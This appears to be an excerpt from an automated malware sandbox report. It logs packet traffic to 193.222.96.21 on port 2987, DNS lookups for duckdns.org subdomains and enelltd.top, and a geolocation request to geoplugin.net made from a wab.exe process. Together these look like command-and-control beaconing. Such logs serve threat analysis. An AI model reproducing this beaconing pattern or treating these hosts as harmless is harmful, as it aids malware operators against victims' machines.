                                                      May 2, 2024 19:02:43.329473972 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329492092 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329503059 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329559088 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329586029 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329600096 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329617023 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329642057 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329672098 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329710007 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329710960 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329732895 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329750061 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329756975 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329809904 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329843998 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329871893 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329883099 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329924107 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329926014 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329938889 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.329968929 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.329988003 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330008984 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330024958 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330033064 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330070972 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330085039 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330111980 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330147028 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330207109 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330224991 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330235004 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330236912 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330246925 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330249071 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330260992 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330270052 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330319881 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330332994 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330348969 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330364943 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330420017 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330449104 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330457926 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330480099 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330501080 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330509901 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330513000 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330528975 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330576897 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330590010 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330600977 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330620050 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330642939 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330657959 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330668926 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330681086 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330697060 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330719948 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330763102 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330774069 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.330790997 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.330813885 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.347618103 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.347640991 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.347745895 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493577003 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493601084 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493613958 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493627071 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493644953 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493659973 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493673086 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493705034 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493712902 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493766069 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493788958 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493803024 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493803978 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493817091 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493839979 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493864059 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493880987 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493901014 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493904114 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493928909 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.493963003 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.493968010 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494009972 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494029045 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494049072 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494060040 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494070053 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494148016 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494160891 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494179964 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494183064 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494220972 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494242907 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494256973 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494267941 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494290113 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494303942 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494324923 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.494474888 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494936943 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.494975090 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.495712042 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.496332884 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.496382952 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.497001886 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.497623920 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.497926950 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.497968912 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.498267889 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498424053 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498435974 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498451948 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498464108 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498467922 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.498486042 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.498497009 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.498608112 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498784065 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.498827934 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499120951 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499134064 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499146938 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499159098 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499171019 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499171019 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499182940 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499193907 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499206066 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499209881 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499219894 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499224901 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499232054 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499238968 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499244928 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499255896 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499267101 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499272108 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499293089 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499298096 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499309063 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499322891 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499336958 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499340057 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499352932 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499361992 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499366045 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499377966 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499383926 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499389887 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499401093 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499418020 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499418974 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499429941 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499438047 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499442101 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499453068 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499464035 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499475002 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499475956 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499488115 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499500036 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499500036 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499512911 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499514103 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499524117 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499536991 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499537945 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499556065 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499562979 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499567986 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499577999 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499588966 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499594927 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499600887 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499610901 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499612093 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499623060 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499631882 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499636889 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499648094 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499659061 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499665022 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499670982 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499680042 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499682903 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499694109 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499705076 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499706030 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499716043 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499720097 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499727011 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499737978 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499752998 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499757051 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499764919 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499775887 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499779940 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499787092 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499798059 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499798059 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499810934 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499823093 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499826908 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499834061 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499845982 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499846935 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499856949 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499867916 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499870062 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499880075 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499891996 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499895096 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499902964 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499912977 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499914885 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499927998 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499938011 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499942064 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499949932 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499953985 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499963045 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499974966 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499986887 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.499994040 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.499998093 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500010014 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500020027 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500025034 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500031948 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500036955 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500047922 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500056028 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500058889 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500070095 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500077963 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500083923 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500097990 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500114918 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500121117 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500127077 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500134945 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500138998 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500150919 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500161886 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500164986 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500173092 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500185966 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500193119 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500199080 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500211954 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500220060 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500222921 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500230074 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500235081 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500246048 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500257015 CEST2987149742193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:43.500261068 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.500282049 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:43.540386915 CEST4974229871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:56.370438099 CEST2987149740193.222.96.21192.168.2.4
                                                      May 2, 2024 19:02:56.415405989 CEST4974029871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:56.734635115 CEST4974029871192.168.2.4193.222.96.21
                                                      May 2, 2024 19:02:56.969127893 CEST2987149740193.222.96.21192.168.2.4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 2, 2024 19:01:50.752511024 CEST6049153192.168.2.41.1.1.1
                                                      May 2, 2024 19:01:50.925055981 CEST53604911.1.1.1192.168.2.4
                                                      May 2, 2024 19:01:56.561995029 CEST5937053192.168.2.41.1.1.1
                                                      May 2, 2024 19:01:57.556396008 CEST5937053192.168.2.41.1.1.1
                                                      May 2, 2024 19:01:58.584929943 CEST5937053192.168.2.41.1.1.1
                                                      May 2, 2024 19:02:00.571760893 CEST5937053192.168.2.41.1.1.1
                                                      May 2, 2024 19:02:00.654227018 CEST53593701.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:00.654247046 CEST53593701.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:00.654356003 CEST53593701.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:00.660341024 CEST53593701.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:00.662130117 CEST6219553192.168.2.41.1.1.1
                                                      May 2, 2024 19:02:00.767519951 CEST53621951.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:01.776484966 CEST5589653192.168.2.41.1.1.1
                                                      May 2, 2024 19:02:01.899205923 CEST53558961.1.1.1192.168.2.4
                                                      May 2, 2024 19:02:36.704521894 CEST5489153192.168.2.41.1.1.1
                                                      May 2, 2024 19:02:36.795912027 CEST53548911.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      May 2, 2024 19:01:50.752511024 CEST192.168.2.41.1.1.10xfb5dStandard query (0)enelltd.topA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:01:56.561995029 CEST192.168.2.41.1.1.10xc049Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:01:57.556396008 CEST192.168.2.41.1.1.10xc049Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:01:58.584929943 CEST192.168.2.41.1.1.10xc049Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.571760893 CEST192.168.2.41.1.1.10xc049Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.662130117 CEST192.168.2.41.1.1.10xb1f9Standard query (0)leirfo45ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:01.776484966 CEST192.168.2.41.1.1.10xe6a3Standard query (0)learfo55ozj02.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:36.704521894 CEST192.168.2.41.1.1.10xf643Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      May 2, 2024 19:01:50.925055981 CEST1.1.1.1192.168.2.40xfb5dNo error (0)enelltd.top104.21.45.139A (IP address)IN (0x0001)false
                                                      May 2, 2024 19:01:50.925055981 CEST1.1.1.1192.168.2.40xfb5dNo error (0)enelltd.top172.67.215.46A (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.654227018 CEST1.1.1.1192.168.2.40xc049Server failure (2)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.654247046 CEST1.1.1.1192.168.2.40xc049Server failure (2)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.654356003 CEST1.1.1.1192.168.2.40xc049Server failure (2)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.660341024 CEST1.1.1.1192.168.2.40xc049Server failure (2)learfo55ozj02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:00.767519951 CEST1.1.1.1192.168.2.40xb1f9Name error (3)leirfo45ozj01.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:01.899205923 CEST1.1.1.1192.168.2.40xe6a3No error (0)learfo55ozj02.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                      May 2, 2024 19:02:36.795912027 CEST1.1.1.1192.168.2.40xf643No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                      • enelltd.top
                                                      • geoplugin.net
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449741178.237.33.50807188C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      May 2, 2024 19:02:36.965058088 CEST71OUTGET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      May 2, 2024 19:02:37.136698961 CEST1173INHTTP/1.1 200 OK
                                                      date: Thu, 02 May 2024 17:02:37 GMT
                                                      server: Apache
                                                      content-length: 965
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
